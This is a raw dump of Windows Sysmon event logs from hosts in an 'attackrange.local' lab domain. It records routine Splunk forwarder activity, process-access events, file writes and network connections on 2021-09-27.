09:25:28.904{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981645Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.904{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981644Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.904{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981643Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.904{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981642Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.904{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981641Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.904{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8E08-6151-277A-00000000FD01}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981640Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.904{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E08-6151-277A-00000000FD01}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981639Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.889{69CF5F33-8E08-6151-277A-00000000FD01}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000981638Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.838{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59560-false10.0.1.12-8000- 10341000x8000000000000000981637Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.216{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E08-6151-267A-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981636Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.216{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981635Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.216{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981634Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.216{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981633Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.216{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981632Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.216{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981631Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.216{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981630Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.216{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981629Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.216{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981628Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.216{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981627Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.216{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8E08-6151-267A-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981626Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.216{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E08-6151-267A-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981625Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.202{69CF5F33-8E08-6151-267A-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981624Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.060{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E4E8E2B6BD08F7E790667AE5E2A7761,SHA256=68D96E3DB135196C53830DF13CA735C3357853DC6664DCFD26E02A74B332BBC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057102Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:28.376{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24C5EC92F3DE54CA84BF0BFC1FCCF8CA,SHA256=4729F96D140DDA3643EA492586DA7485DD13A060C29D53E513515920FD5EEA17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981623Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.013{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BE43F783F024A14C5BAC6AF698D7327,SHA256=0650E743FEFD6B3833AC3407B200FD5C145D1E172E9B88EE819605622403FD00,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057114Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:28.275{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse103.24.1.102-54036-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001057113Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.798{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E09-6151-C100-00000000FD01}2192C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057112Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.798{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057111Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.798{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057110Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 